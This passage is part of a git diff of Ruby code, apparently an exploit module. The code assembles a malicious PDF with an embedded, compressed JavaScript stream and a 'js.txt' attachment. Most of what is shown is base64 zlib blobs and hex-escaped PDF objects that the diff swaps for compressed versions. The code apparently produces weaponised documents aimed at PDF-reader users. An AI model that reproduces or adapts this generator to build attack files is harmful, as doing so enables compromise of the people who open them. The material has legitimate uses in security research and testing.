"eJzjtbHRd3HU0PdIzSlTMFAISQMS6Qqa+i5BQAnXvOT8lMy8dCAzwMXNJT8ZJqBgYgpUF2Rnp++Wn1cClPZIdcpXMLYECUKMMjEHs6MSXZIUTCwgikHKM1NzUoqjjcEisXZ2vADEuSJw") + add_compressed(3, "eJztV91umzAUfoK8g8UuN2OMIQkWUFWJplUqU7VGam+N7aSs/AmMQvtqvdgj7RVmEpKRNJp2M2kXWAjZ+Hzfd3zO4Uie+D66lflGPQFCMEH3TaxeSokeo1u06iaRVEwwxcKwVpVk2cS/akvGn6UCsdwkeWD8fPthgEQExoMbWVG5kE/Jl9dK3r9+XfHXZ+4J4yqc+C1tszLTZKDN0rymbWAwUcSS6nn3GRlgZ6KeA+O62wCP0R1YFJUErulAblkumM1N7MyIPf0EbAvbyJojm0BMqNU9oB9GONFvvxJr+m35uZfTq8B4UqqkCG23W3NLzKLaIOx5HrJsZNtQW8D6JVeshXn9YU9y4FnKmldJqZIiB92axUWjAsOYgMHoz5WVR6G8NndnNHmRoZaVCJsWugQS/IgpmyrduSY4kqnMZK5qjcMXcVosiv4sl2UXkeUgHic4vaFxBB0D0MVA69CoEMn6ZcmUDHXwHWi5kOAVtil2qD3VS2pZPjqzPONY6ApScsBBdhyEEpe6+KNlHzkGlud+9AX5V54MbS/5UlSrokjDfcFd86qImQJYx23gRW8zgAtO10WVMRWyskwTzrrC6CLno99bp/YqUenQhUNlXafq9OthI026TNGU5ZvAaKGQa9akygi/16ZqlY/2NmeM6D3lzqVzdX9XOHRZ8KYrsJtl2DSJoJ6Yu1NPSjhbizl0nJhBj885nErXtl3iejFzd4E5xb7jvclrxXIuD7wOn1nONNaZcjwCPcuJIXNdGwqOZ3ObxySO8YF3gB3w6tjSu6oQDZdVeMjTg4zBgpWq0T1in7MTs8kwKIM/eN8eUN8fdGtCx970LhX/ZIwio8goMoqMIqPIKPJfiQxuNzLXV5ptd3fRs/7u8wtzq37r") + add_compressed(32, "eJzjtbHR93QJVjA0VzBQCNIPDfIBsi1AbDs7XgBc3QYo") + add_compressed(7, "eJzjtbHRd84vzStRMNJ3yywqLlGwUDBQCNL3SYQzQyoLUvX9S0tyMvNSi+3seAF54Q8a") + add_compressed(16, "eJzjtbHRd84vzStRMNT3zkwpjjYyUzBQCIrVD6ksSNUPSExPLbaz4wUA0/wLJA==") + add_compressed(22, "eJzjtbHRD1Mw1DMytbPjBQARcgJ6") + add_compressed(10, "eJzjtbHRd85JLC72TSxQMDRUMFAI0vdWMDQCMwISi1LzSkKKUlMVDI3RRPxSK0q8UysVDPVDKgtS9YNLikqTwRJB+fkldna8AIaCG78=") + add_compressed(11, "eJzjtbHRDy5IKXIsKgGy/PXDU5OcEwtKSotS7YCAFwCW+AmR") + add_compressed(12, "eJzjtbHR91YwNFUwUAjSD1AwNAAzgvVd8pNLc1PzSuzseAGGCwiD") + add_compressed(13, "eJzjtbHR9yvNLY42UDA0UTBQCIq1s+MFADohBRA=") + add_compressed(14, "eJzjjTY0VTBQCFKAULG8ABzfA0M=") + add_compressed(15, "eJzjtbHRd9YPLkgpciwq0feONlAwjNUPUDA0UjBQCNIPSFcwMgOzgvWB8pnJOal2drwAYtsNjA==") + add_compressed(26, "eJx1jk0KwkAMhU/QO+QEnRmnrQiloBXEhVBaV4qLoQ0iyGSYH9Dbm7ZrAwn54L2XZHUt9tZSDFAokNCLlmxEy1wWK3tyB/rcZS5h7kpteG53PB/i5Ck50KvyfARdLtsFp5f5a+puoHIpOuP5DqhqsfQYKPkRAz/U0pv84MyIMwwStJ41DZfoKZqIIMUQfRrjGhKYr1+HnPnEpsl+Bag7pA==") + add_compressed(41, "eJzjjTa2UDBQCIrlBQAKzAIA") + add_compressed(54, "eJwBzwAw/w08PC9GaWx0ZXIvRmxhdGVEZWNvZGUvTGVuZ3RoIDE1ND4+c3RyZWFtDUiJXE7BDcIwFLv3K/IFvlatYzAG66bgYSDM2/BQa6cDXWV7gv69m7d5SEISCKGs57axjpEklDFbd/MX1GQCc3jgRMaEN2oNDSVHrMeoep358/SgXQjse9Dx5w722naW29AhTU2RQ2zLkSivJNwABQyuE0pitYGO1SLSiJbxJL0XjaDpibv76UiZ7wvI+cx/rWb1V4ABAMukNiwNZW5kc3RyZWFtDcyfYBU=") + add_compressed(34, "eJzjtbHRdw5WMDZTMFAI0g/WDylKzCsuSCxKzUuutLPjBQB75gjK") + add_compressed(35, "eJzj1ZA6peCnxVrNzHD3v1xSmdpmTV4AOosGFg==") + add_compressed(33, "eJzjjdb3dHZ2SixOTVEwslQwUAiK5QUANnUE/Q==") + add_compressed(29, "eJwBEQHu/g08PC9GaWx0ZXIvRmxhdGVEZWNvZGUvTGVuZ3RoIDIxNi9OIDE+PnN0cmVhbQ1IiWJgYJzh6OLkyiTAwJCbV1LkHuQYGREZpcB+noGNgZkBDBKTiwscAwJ8QOy8/LxUBgzw7RoDI4i+rAsyC1MeL2BNLigqAdIHgNgoJbU4GUh/AeLM8pICoDhjApAtkpQNZoPUiWSHBDkD2R1ANl9JagVIjME5v6CyKDM9o0TB0NLSUsExJT8pVSG4srgkNbdYwTMvOb+oIL8osSQ1BagWagcI8LsXJVYquCfm5iYqGOkZkehyIgAoLCGszyHgMGIUO48QQ4Dk0qIyKJORyZiBASDAAEnGOC8NZW5kc3RyZWFtDYkear8=") + add_compressed(36, "eJzjjdb3dHZ2SixOTVEwNlAwUAiK5QUANj4E9Q==") + add_compressed(30, "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") + add_compressed(38, "eJxNjbEOgjAYhJ+Ad/hHWPgplIoJaVIwaGIwRGsciAtYCFGLQx18e1vi4HDDXe6+8/IcBdAEIjiiaKw7QEqc4xw3wsedKmYgMcjBhmOAFVCsJBZGYzUAS9OEYb23u2LbkjCCn65YCr98TP0dnipA2QCxwAZitjwdVW/ayFajkBGasQwYIWGSUVitY7c+vTvzeSm8TLdRGZR+Z/SCqx3t/I92NaH1bDj3vvt1NZc=") + add_compressed(43, "eJzjtbHR9wpWMDFTMFAI0g/W90osSwxOLsosKLGz4wUAaC0Hzw==") + add_compressed(51, "eJxNjtEKgkAQRb9g/mG/wHHRTEF8kPCpyDIoEB/UJivQrXUF+/t2Y4seLnPhzj1ciGNMUzGXruMyo4Bzxwt9tozMXVSYCdkfXg9iHNc0dOrKAh83tZK3ueS2ZPTnK9zTKCbZ0qjxuRRtQarEfJVVSYLF1CjN+4DRkPG0be7UqiQZlaS6B8460CC7xQu/YziTBBd46gfOAjeyYRj9wiMMsAMazpb0BnLmPE4=") js = Zlib::Deflate.deflate(js) add_object(46, "\x0d<</Filter[/FlateDecode]/Length #{js.length}>>stream\x0d#{js}\x0dendstream\x0d") - add_object(8, "\xd\x3c\x3c\x2f\x43\x6f\x75\x6e\x74\x20\x31\x2f\x46\x69\x72\x73\x74\x20\x39\x20\x30\x20\x52\x2f\x4c\x61\x73\x74\x20\x39\x20\x30\x20\x52\x2f\x50\x61\x72\x65\x6e\x74\x20\x37\x20\x30\x20\x52\x2f\x54\x69\x74\x6c\x65\x28\x4c\x6f\x63\x61\x6c\x20\x44\x69\x73\x6b\x29\x3e\x3e\xd") - add_object(9, "\xd\x3c\x3c\x2f\x44\x65\x73\x74\x5b\x32\x36\x20\x30\x20\x52\x2f\x58\x59\x5a\x20\x30\x20\x37\x39\x32\x20\x6e\x75\x6c\x6c\x5d\x2f\x50\x61\x72\x65\x6e\x74\x20\x38\x20\x30\x20\x52\x2f\x53\x45\x20\x31\x35\x20\x30\x20\x52\x2f\x54\x69\x74\x6c\x65\x28\xfe\xff\x0\x6a\x0\x73\x0\x2e\x0\x74\x0\x78\x0\x74\x29\x3e\x3e\xd") - add_object(17, "\xd\x3c\x3c\x2f\x4e\x61\x6d\x65\x73\x5b\x33\x35\x20\x30\x20\x52\x20\x32\x30\x20\x30\x20\x52\x5d\x3e\x3e\xd") - add_object(18, "\xd\x3c\x3c\x2f\x4e\x61\x6d\x65\x73\x5b\x31\x39\x20\x30\x20\x52\x20\x32\x30\x20\x30\x20\x52\x5d\x3e\x3e\xd") - add_object(19, "\xd\x28\x66\x69\x6c\x65\x3a\x2f\x2f\x2f\x43\x7c\x2f\x74\x65\x6d\x70\x2f\x6a\x73\x2e\x74\x78\x74\x29\xd") - add_object(20, "\xd\x3c\x3c\x2f\x43\x54\x28\x74\x65\x78\x74\x2f\x70\x6c\x61\x69\x6e\x29\x2f\x49\x44\x20\x33\x35\x20\x30\x20\x52\x2f\x4f\x5b\x32\x36\x20\x30\x20\x52\x5d\x2f\x53\x2f\x53\x50\x53\x2f\x53\x49\x20\x32\x31\x20\x30\x20\x52\x2f\x54\x28\xfe\xff\x0\x6a\x0\x73\x0\x2e\x0\x74\x0\x78\x0\x74\x29\x2f\x54\x53\x28\x44\x3a\x32\x30\x31\x34\x30\x33\x33\x31\x31\x31\x33\x35\x35\x32\x5a\x29\x3e\x3e\xd") - add_object(21, "\xd\x3c\x3c\x2f\x41\x55\x20\x31\x39\x20\x30\x20\x52\x2f\x54\x53\x28\x44\x3a\x32\x30\x31\x34\x30\x33\x33\x31\x31\x31\x33\x35\x35\x32\x5a\x29\x3e\x3e\xd") - add_object(39, "\xd\x3c\x3c\x2f\x42\x61\x73\x65\x46\x6f\x6e\x74\x2f\x48\x65\x6c\x76\x65\x74\x69\x63\x61\x2d\x42\x6f\x6c\x64\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x20\x34\x35\x20\x30\x20\x52\x2f\x4e\x61\x6d\x65\x2f\x48\x65\x42\x6f\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x54\x79\x70\x65\x31\x2f\x54\x79\x70\x65\x2f\x46\x6f\x6e\x74\x3e\x3e\xd") - add_object(47, "\xd\x3c\x3c\x2f\x42\x61\x73\x65\x46\x6f\x6e\x74\x2f\x48\x65\x6c\x76\x65\x74\x69\x63\x61\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x20\x34\x35\x20\x30\x20\x52\x2f\x4e\x61\x6d\x65\x2f\x48\x65\x6c\x76\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x54\x79\x70\x65\x31\x2f\x54\x79\x70\x65\x2f\x46\x6f\x6e\x74\x3e\x3e\xd") - add_object(48, "\xd\x3c\x3c\x2f\x42\x61\x73\x65\x46\x6f\x6e\x74\x2f\x5a\x61\x70\x66\x44\x69\x6e\x67\x62\x61\x74\x73\x2f\x4e\x61\x6d\x65\x2f\x5a\x61\x44\x62\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x54\x79\x70\x65\x31\x2f\x54\x79\x70\x65\x2f\x46\x6f\x6e\x74\x3e\x3e\xd") - add_object(45, "\xd\x3c\x3c\x2f\x44\x69\x66\x66\x65\x72\x65\x6e\x63\x65\x73\x5b\x32\x34\x2f\x62\x72\x65\x76\x65\x2f\x63\x61\x72\x6f\x6e\x2f\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x64\x6f\x74\x61\x63\x63\x65\x6e\x74\x2f\x68\x75\x6e\x67\x61\x72\x75\x6d\x6c\x61\x75\x74\x2f\x6f\x67\x6f\x6e\x65\x6b\x2f\x72\x69\x6e\x67\x2f\x74\x69\x6c\x64\x65\x20\x33\x39\x2f\x71\x75\x6f\x74\x65\x73\x69\x6e\x67\x6c\x65\x20\x39\x36\x2f\x67\x72\x61\x76\x65\x20\x31\x32\x38\x2f\x62\x75\x6c\x6c\x65\x74\x2f\x64\x61\x67\x67\x65\x72\x2f\x64\x61\x67\x67\x65\x72\x64\x62\x6c\x2f\x65\x6c\x6c\x69\x70\x73\x69\x73\x2f\x65\x6d\x64\x61\x73\x68\x2f\x65\x6e\x64\x61\x73\x68\x2f\x66\x6c\x6f\x72\x69\x6e\x2f\x66\x72\x61\x63\x74\x69\x6f\x6e\x2f\x67\x75\x69\x6c\x73\x69\x6e\x67\x6c\x6c\x65\x66\x74\x2f\x67\x75\x69\x6c\x73\x69\x6e\x67\x6c\x72\x69\x67\x68\x74\x2f\x6d\x69\x6e\x75\x73\x2f\x70\x65\x72\x74\x68\x6f\x75\x73\x61\x6e\x64\x2f\x71\x75\x6f\x74\x65\x64\x62\x6c\x62\x61\x73\x65\x2f\x71\x75\x6f\x74\x65\x64\x62\x6c\x6c\x65\x66\x74\x2f\x71\x75\x6f\x74\x65\x64\x62\x6c\x72\x69\x67\x68\x74\x2f\x71\x75\x6f\x74\x65\x6c\x65\x66\x74\x2f\x71\x75\x6f\x74\x65\x72\x69\x67\x68\x74\x2f\x71\x75\x6f\x74\x65\x73\x69\x6e\x67\x6c\x62\x61\x73\x65\x2f\x74\x72\x61\x64\x65\x6d\x61\x72\x6b\x2f\x66\x69\x2f\x66\x6c\x2f\x4c\x73\x6c\x61\x73\x68\x2f\x4f\x45\x2f\x53\x63\x61\x72\x6f\x6e\x2f\x59\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x5a\x63\x61\x72\x6f\x6e\x2f\x64\x6f\x74\x6c\x65\x73\x73\x69\x2f\x6c\x73\x6c\x61\x73\x68\x2f\x6f\x65\x2f\x73\x63\x61\x72\x6f\x6e\x2f\x7a\x63\x61\x72\x6f\x6e\x20\x31\x36\x30\x2f\x45\x75\x72\x6f\x20\x31\x36\x34\x2f\x63\x75\x72\x72\x65\x6e\x63\x79\x20\x31\x36\x36\x2f\x62\x72\x6f\x6b\x65\x6e\x62\x61\x72\x20\x31\x36\x38\x2f\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x63\x6f\x70\x79\x72\x69\x67\x68\x74\x2f\x6f\x72\x64\x66\x65\x6d\x69\x6e\x69\x6e\x65\x20\x31\x37\x32\x2f\x6c\x6f\x67\x69\x63\x61\x6c\x6e\x6f\x74\x2f\x2e\x6e\x6f\x74\x64\x65\x66\x2f\x72\x65\x67\x69\x73\x74\x65\x72\x65\x64\x2f\x6d\x61\x63\x72\x6f\x6e\x2f\x64\x65\x67\x72\x65\x65\x2f\x70\x6c\x75\x73\x6d\x69\x6e\x75\x73\x2f\x74\x77\x6f\x73\x75\x70\x65\x72\x69\x6f\x72\x2f\x74\x68\x72\x65\x65\x73\x75\x70\x65\x72\x69\x6f\x72\x2f\x61\x63\x75\x74\x65\x2f\x6d\x75\x20\x31\x38\x33\x2f\x70\x65\x72\x69\x6f\x64\x63\x65\x6e\x74\x65\x72\x65\x64\x2f\x63\x65\x64\x69\x6c\x6c\x61\x2f\x6f\x6e\x65\x73\x75\x70\x65\x72\x69\x6f\x72\x2f\x6f\x72\x64\x6d\x61\x73\x63\x75\x6c\x69\x6e\x65\x20\x31\x38\x38\x2f\x6f\x6e\x65\x71\x75\x61\x72\x74\x65\x72\x2f\x6f\x6e\x65\x68\x61\x6c\x66\x2f\x74\x68\x72\x65\x65\x71\x75\x61\x72\x74\x65\x72\x73\x20\x31\x39\x32\x2f\x41\x67\x72\x61\x76\x65\x2f\x41\x61\x63\x75\x74\x65\x2f\x41\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x41\x74\x69\x6c\x64\x65\x2f\x41\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x41\x72\x69\x6e\x67\x2f\x41\x45\x2f\x43\x63\x65\x64\x69\x6c\x6c\x61\x2f\x45\x67\x72\x61\x76\x65\x2f\x45\x61\x63\x75\x74\x65\x2f\x45\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x45\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x49\x67\x72\x61\x76\x65\x2f\x49\x61\x63\x75\x74\x65\x2f\x49\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x49\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x45\x74\x68\x2f\x4e\x74\x69\x6c\x64\x65\x2f\x4f\x67\x72\x61\x76\x65\x2f\x4f\x61\x63\x75\x74\x65\x2f\x4f\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x4f\x74\x69\x6c\x64\x65\x2f\x4f\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x6d\x75\x6c\x74\x69\x70\x6c\x79\x2f\x4f\x73\x6c\x61\x73\x68\x2f\x55\x67\x72\x61\x76\x65\x2f\x55\x61\x63\x75\x74\x65\x2f\x55\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x55\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x59\x61\x63\x75\x74\x65\x2f\x54\x68\x6f\x72\x6e\x2f\x67\x65\x72\x6d\x61\x6e\x64\x62\x6c\x73\x2f\x61\x67\x72\x61\x76\x65\x2f\x61\x61\x63\x75\x74\x65\x2f\x61\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x61\x74\x69\x6c\x64\x65\x2f\x61\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x61\x72\x69\x6e\x67\x2f\x61\x65\x2f\x63\x63\x65\x64\x69\x6c\x6c\x61\x2f\x65\x67\x72\x61\x76\x65\x2f\x65\x61\x63\x75\x74\x65\x2f\x65\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x65\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x69\x67\x72\x61\x76\x65\x2f\x69\x61\x63\x75\x74\x65\x2f\x69\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x69\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x65\x74\x68\x2f\x6e\x74\x69\x6c\x64\x65\x2f\x6f\x67\x72\x61\x76\x65\x2f\x6f\x61\x63\x75\x74\x65\x2f\x6f\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x6f\x74\x69\x6c\x64\x65\x2f\x6f\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x64\x69\x76\x69\x64\x65\x2f\x6f\x73\x6c\x61\x73\x68\x2f\x75\x67\x72\x61\x76\x65\x2f\x75\x61\x63\x75\x74\x65\x2f\x75\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x75\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x79\x61\x63\x75\x74\x65\x2f\x74\x68\x6f\x72\x6e\x2f\x79\x64\x69\x65\x72\x65\x73\x69\x73\x5d\x2f\x54\x79\x70\x65\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3e\x3e\xd") - add_object(23, "\xd\x3c\x3c\x2f\x43\x72\x65\x61\x74\x69\x6f\x6e\x44\x61\x74\x65\x28\x44\x3a\x32\x30\x31\x34\x30\x33\x33\x31\x31\x33\x33\x35\x35\x31\x2b\x30\x32\x27\x30\x30\x27\x29\x2f\x43\x72\x65\x61\x74\x6f\x72\x28\x41\x64\x6f\x62\x65\x20\x41\x63\x72\x6f\x62\x61\x74\x20\x31\x31\x2e\x30\x29\x2f\x4d\x6f\x64\x44\x61\x74\x65\x28\x44\x3a\x32\x30\x31\x34\x30\x35\x33\x31\x31\x32\x31\x34\x32\x36\x2d\x30\x35\x27\x30\x30\x27\x29\x2f\x50\x72\x6f\x64\x75\x63\x65\x72\x28\x41\x63\x72\x6f\x62\x61\x74\x20\x57\x65\x62\x20\x43\x61\x70\x74\x75\x72\x65\x20\x31\x31\x2e\x30\x29\x2f\x54\x69\x74\x6c\x65\x28\x6a\x73\x2e\x74\x78\x74\x29\x3e\x3e\xd") + add_compressed(8, "eJzjtbHRd84vzStRMNR3yywqLlGwVDBQCNL3SYQzAxKLUoHy5mBOSGZJTqqGT35yYo6CS2ZxtqadHS8AmCkTkg==") + add_compressed(9, "eJzjtbHRd0ktLok2MlMwUAjSj4iMAtLmlkYKeaU5ObH6AYlFqXklChZgyWBXBUNTMCsksyQnVePff4YshmIGPYYShgqGEk07O14AWScVgw==") + add_compressed(17, "eJzjtbHR90vMTS2ONjZVMFAIUjAyAFGxdna8AF4CBlg=") + add_compressed(18, "eJzjtbHR90vMTS2ONrRUMFAIUjAyAFGxdna8AF4gBlo=") + add_compressed(19, "eJzj1UjLzEm10tfXd67RL0nNLdDPKtYrqSjR5AUAaRoIEQ==") + add_compressed(20, "eJzjtbHRdw7RKEmtKNEvyEnMzNPU93RRMDZVMFAI0vePNjIDMWL1g/WDA4DYU8HIECwTovHvP0MWQzGDHkMJQwVDiaZ+SLCGi5WRgaGJgbGxoaGhsampUZSmnR0vAOIUGEU=") + add_compressed(21, "eJzjtbHRdwxVMLRUMFAI0g8J1nCxMjIwNDEwNjY0NDQ2NTWK0rSz4wUAmbEH3g==") + add_compressed(39, "eJzjtbHRd0osTnXLzyvR90jNKUstyUxO1HXKz0nRd81Lzk/JzEtXMDFVMFAI0vdLzE0FqnHK1w8uTSqpLEjVDwEShmBSH2SAnR0vACeXGlQ=") + add_compressed(47, "eJzjtbHRd0osTnXLzyvR90jNKUstyUxO1HfNS85PycxLVzAxVTBQCNL3S8xNBUvrB5cmlVQWpOqHAAlDMKkP0mtnxwsAqd8Y1w==") + add_compressed(48, "eJzjtbHRd0osTnXLzyvRj0osSHPJzEtPSiwp1vdLzE0Firgk6QeXJpVUFqTqhwAJQzCpD1JuZ8cLAJhsFTA=") + add_compressed(45, "eJxNk81u2zAMx5+g75AnGJe0yFKgKGB0PgQYlsOaQzfswEi0LUSWUn1ky55+tJiovkQm+f+RFMXcPT3BV9N1FMgpir9WD3AIdCZQGLwDZYLKY2fpL2ifUClyCYbsegx5tJgT+N47OkIwrodkrKbF/SO8Z58ossvS4nENfcAzLZarDRyytZRAY99TuB76YIGsNadoItCoMQ5Arhyd9ZwYuoAqGW6nz8aWtJa69GEF0w8JRuNyhBOFNPgc0Wlpg9MfMFI1CnozhCzWh3/mLOkLngJqGjEcoTPcF3yLdupw18IPGdWbNjzE6Q4/xcEDsxSjAStSTxAl8q8ci+X6M7Q5eP54AJXD9AQXNtb8BP5I7oCBrQ3UxMqfLtKcD7ojvrBxPNcvK7C+Nwqt8wk+8Y+mDgL1JvJlSMOIqjREfSCCk81RZpX++Jh5YMYHSAPHqoUqJ4IxL5abeyg+PT19yaZIG2sR+N2rnvsZMapsS0ObzRR8zxiYmD4HtJ1UuDrjYvm4gqYsBjRSrZktW1NWCZp69aYsWNPCy618K3ArcDuD20ptRbMVzXam2VZNmwb4LuV2It+JfDeT766CSo3ZJnOyF9jJ4+4F3Qu6n6H7yrxJ8HXwgVeZwsg7erARUFiUMM5YlLJYU2AZA/Lf8zYGEpgEphlMlTKiMaIxM42pGuIxOCnnRe5F7mdyfxVUSpuzmRwyhCxgFjDPwFyJiwRTGcLl5v4Nr5cTv6JTnNv1z893/wElCbzZ") + add_compressed(23, "eJxNzLEKgzAQgOEn8B2ymVCqd4npUEQQXQsdCp0Tc4Ol9Ep6Qh+/gg7d/+8v2rYeMgWZ+TUGIT2eLWADziE65z0ewJYApdkqzrpPHEn1U+YYRCFWYOoLp3/sV2yxsacj+A1fM6dlolXv7k5RDeEtS6b9cZvlSfrxqeQrpuuKH+VYK70=") @xref_offset = @pdf.length @pdf << xref_table << trailer(25) << startxref From f918bcc631489e77715ea16e4dfcfa101f005ca7 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 